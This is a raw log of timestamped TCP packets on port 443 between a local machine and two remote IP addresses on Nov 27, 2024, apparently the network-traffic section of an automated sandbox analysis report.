                                                  Nov 27, 2024 18:10:04.887972116 CET4434981113.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:04.935339928 CET4434981113.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:04.941987991 CET49811443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:05.261576891 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:05.261614084 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:05.261631966 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:05.261742115 CET49809443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:05.261779070 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:05.261847973 CET49809443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:05.309922934 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:05.309942007 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:05.310020924 CET49809443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:05.310041904 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:05.310206890 CET49809443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:05.471827984 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:05.471854925 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:05.471915007 CET49809443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:05.471941948 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:05.471956015 CET49809443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:05.471978903 CET49809443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:05.500873089 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:05.500890017 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:05.500979900 CET49809443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:05.500993013 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:05.501142979 CET49809443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:05.518430948 CET4434980113.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:05.518624067 CET4434980113.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:05.518682003 CET49801443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:05.532154083 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:05.532171965 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:05.532252073 CET49809443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:05.532260895 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:05.532301903 CET49809443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:05.559243917 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:05.559261084 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:05.559341908 CET49809443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:05.559351921 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:05.559542894 CET49809443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:05.675856113 CET49801443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:05.675900936 CET4434980113.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:05.682821989 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:05.682842016 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:05.682934046 CET49809443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:05.682946920 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:05.682987928 CET49809443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:05.707707882 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:05.707724094 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:05.707802057 CET49809443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:05.707814932 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:05.707860947 CET49809443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:05.712105989 CET4434981213.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:05.712667942 CET49812443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:05.712685108 CET4434981213.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:05.713166952 CET49812443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:05.713171959 CET4434981213.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:05.730801105 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:05.730818033 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:05.730904102 CET49809443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:05.730914116 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:05.730959892 CET49809443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:05.753120899 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:05.753143072 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:05.753221989 CET49809443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:05.753232002 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:05.753277063 CET49809443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:05.772224903 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:05.772248030 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:05.772349119 CET49809443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:05.772361040 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:05.772413015 CET49809443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:05.774868965 CET4434981313.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:05.775434017 CET49813443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:05.775495052 CET4434981313.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:05.775918961 CET49813443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:05.775935888 CET4434981313.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:05.792922020 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:05.792941093 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:05.793000937 CET49809443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:05.793010950 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:05.793054104 CET49809443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:05.815496922 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:05.815515041 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:05.815594912 CET49809443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:05.815602064 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:05.815646887 CET49809443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:05.823999882 CET4434981413.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:05.824615955 CET49814443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:05.824636936 CET4434981413.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:05.825253963 CET49814443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:05.825258017 CET4434981413.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:05.890208006 CET4434981613.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:05.890744925 CET49816443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:05.890769958 CET4434981613.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:05.891207933 CET49816443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:05.891213894 CET4434981613.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:05.903821945 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:05.903840065 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:05.903892040 CET49809443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:05.903920889 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:05.903942108 CET49809443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:05.903964996 CET49809443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:05.920578957 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:05.920598030 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:05.920650005 CET49809443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:05.920659065 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:05.920706987 CET49809443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:05.938180923 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:05.938198090 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:05.938255072 CET49809443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:05.938262939 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:05.938308954 CET49809443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:05.942797899 CET4434981513.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:05.943224907 CET49815443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:05.943288088 CET4434981513.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:05.943674088 CET49815443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:05.943689108 CET4434981513.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:05.947329044 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:05.947344065 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:05.947393894 CET49809443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:05.947418928 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:05.947463036 CET49809443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:05.954865932 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:05.954880953 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:05.954940081 CET49809443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:05.954965115 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:05.955019951 CET49809443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:05.962594032 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:05.962613106 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:05.962658882 CET49809443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:05.962688923 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:05.962713003 CET49809443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:05.962739944 CET49809443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:05.969664097 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:05.969682932 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:05.969737053 CET49809443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:05.969746113 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:05.969789028 CET49809443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:05.988531113 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:05.988548994 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:05.988605976 CET49809443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:05.988617897 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:05.988662958 CET49809443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:06.109361887 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:06.109380007 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:06.109453917 CET49809443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:06.109467983 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:06.109507084 CET49809443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:06.116827011 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:06.116846085 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:06.116905928 CET49809443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:06.116914988 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:06.116956949 CET49809443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:06.123768091 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:06.123785019 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:06.123846054 CET49809443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:06.123853922 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:06.123898983 CET49809443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:06.131676912 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:06.131692886 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:06.131766081 CET49809443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:06.131772995 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:06.131814957 CET49809443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:06.139513016 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:06.139528036 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:06.139574051 CET49809443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:06.139580965 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:06.139626026 CET49809443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:06.147453070 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:06.147469044 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:06.147525072 CET49809443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:06.147532940 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:06.147583961 CET49809443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:06.154966116 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:06.154987097 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:06.155046940 CET49809443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:06.155056000 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:06.155122995 CET49809443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:06.163003922 CET4434981213.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:06.163072109 CET4434981213.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:06.163131952 CET49812443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:06.163420916 CET49812443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:06.163420916 CET49812443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:06.163434982 CET4434981213.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:06.163444042 CET4434981213.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:06.166868925 CET49817443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:06.166918039 CET4434981713.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:06.167093992 CET49817443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:06.167212009 CET49817443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:06.167222977 CET4434981713.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:06.199390888 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:06.199409962 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:06.199471951 CET49809443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:06.199484110 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:06.199526072 CET49809443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:06.256989956 CET4434981313.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:06.257052898 CET4434981313.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:06.257116079 CET49813443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:06.257354975 CET49813443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:06.257397890 CET4434981313.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:06.257427931 CET49813443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:06.257442951 CET4434981313.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:06.260679007 CET49818443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:06.260719061 CET4434981813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:06.260785103 CET49818443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:06.260972023 CET49818443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:06.260987043 CET4434981813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:06.276200056 CET4434981413.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:06.276261091 CET4434981413.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:06.276312113 CET49814443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:06.276459932 CET49814443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:06.276468039 CET4434981413.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:06.276483059 CET49814443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:06.276489019 CET4434981413.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:06.279237986 CET49819443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:06.279262066 CET4434981913.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:06.279330969 CET49819443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:06.279481888 CET49819443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:06.279495001 CET4434981913.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:06.296818018 CET4434981094.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:06.296847105 CET4434981094.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:06.296864033 CET4434981094.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:06.296911001 CET49810443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:06.296947956 CET4434981094.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:06.296961069 CET49810443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:06.296994925 CET49810443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:06.300993919 CET4434981094.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:06.333003044 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:06.333029985 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:06.333081007 CET49809443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:06.333103895 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:06.333127975 CET49809443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:06.333137989 CET49809443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:06.340500116 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:06.340527058 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:06.340560913 CET49809443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:06.340568066 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:06.340610981 CET49809443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:06.343553066 CET49810443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:06.347553968 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:06.347579956 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:06.347614050 CET49809443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:06.347620964 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:06.347654104 CET49809443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:06.347672939 CET49809443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:06.356148005 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:06.356175900 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:06.356210947 CET49809443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:06.356218100 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:06.356259108 CET49809443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:06.356281996 CET49809443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:06.361330032 CET4434981094.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:06.361349106 CET4434981094.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:06.361401081 CET49810443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:06.361413002 CET4434981094.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:06.361443043 CET49810443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:06.361473083 CET49810443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:06.363022089 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:06.363049030 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:06.363086939 CET49809443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:06.363094091 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:06.363127947 CET49809443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:06.363152981 CET49809443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:06.370553017 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:06.370582104 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:06.370620012 CET49809443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:06.370628119 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:06.370670080 CET49809443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:06.370683908 CET49809443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:06.378684044 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:06.378717899 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:06.378758907 CET49809443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:06.378765106 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:06.378804922 CET49809443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:06.409557104 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:06.409589052 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:06.409640074 CET49809443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:06.409648895 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:06.409687042 CET49809443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:06.409697056 CET49809443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:06.480798960 CET4434981094.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:06.480820894 CET4434981094.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:06.480899096 CET49810443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:06.480973959 CET4434981094.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:06.481010914 CET49810443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:06.481034994 CET49810443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:06.483503103 CET4434981113.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:06.483788013 CET4434981113.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:06.483851910 CET49811443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:06.484066963 CET49811443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:06.484101057 CET4434981113.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:06.485219002 CET4434981094.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:06.485270977 CET49810443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:06.500468969 CET4434979413.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:06.500874996 CET4434979413.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:06.500922918 CET49794443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:06.501270056 CET49794443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:06.501286030 CET4434979413.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:06.502960920 CET4434981613.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:06.503139973 CET4434981613.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:06.503194094 CET49816443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:06.509267092 CET49816443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:06.509285927 CET4434981613.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:06.512701988 CET4434981513.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:06.512754917 CET49820443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:06.512763023 CET4434981513.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:06.512794971 CET4434982013.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:06.512825966 CET49815443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:06.512857914 CET49820443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:06.512923956 CET49815443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:06.512923956 CET49815443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:06.512953997 CET4434981513.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:06.512976885 CET4434981513.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:06.513115883 CET49820443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:06.513133049 CET4434982013.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:06.515404940 CET49821443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:06.515438080 CET4434982113.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:06.515507936 CET49821443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:06.515647888 CET49821443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:06.515661001 CET4434982113.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:06.519268036 CET4434981094.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:06.519301891 CET4434981094.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:06.519345999 CET4434981094.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:06.519427061 CET49810443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:06.519427061 CET49810443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:06.520000935 CET49810443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:06.520014048 CET4434981094.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:06.526326895 CET49822443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:06.526335955 CET4434982294.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:06.526387930 CET49822443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:06.526880980 CET49822443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:06.526890993 CET4434982294.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:06.529824018 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:06.529843092 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:06.529903889 CET49809443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:06.529925108 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:06.529968977 CET49809443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:06.538005114 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:06.538022041 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:06.538070917 CET49809443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:06.538079023 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:06.538121939 CET49809443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:06.545627117 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:06.545643091 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:06.545696974 CET49809443192.168.2.694.247.42.112
